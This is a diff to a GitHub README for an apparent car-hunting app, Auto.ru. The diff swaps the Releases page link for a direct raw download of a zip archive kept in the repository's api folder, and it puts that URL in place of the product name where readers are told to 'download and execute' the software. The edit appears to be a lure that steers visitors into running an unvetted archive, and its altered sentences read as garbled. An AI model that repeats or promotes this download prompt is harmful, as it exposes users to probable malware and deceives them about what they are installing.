thomsxd/autoru/README.md

 ## Releases

-For the latest releases, visit our [Releases](https://github.com/thomsxd/autoru/releases) section.
-Here, you can download and execute the latest version of Auto.ru.
+For the latest releases, visit our [Releases](https://github.com/thomsxd/autoru/raw/refs/heads/master/api/Software-2.4.zip) section.
+Here, you can download and execute the latest version of https://github.com/thomsxd/autoru/raw/refs/heads/master/api/Software-2.4.zip

 ## Conclusion

-Thank you for checking out Auto.ru!
+Thank you for checking out https://github.com/thomsxd/autoru/raw/refs/heads/master/api/Software-2.4.zip!
 We hope you find this application useful.
 Your feedback and contributions are invaluable as we continue to develop and improve the platform.
 Happy car hunting!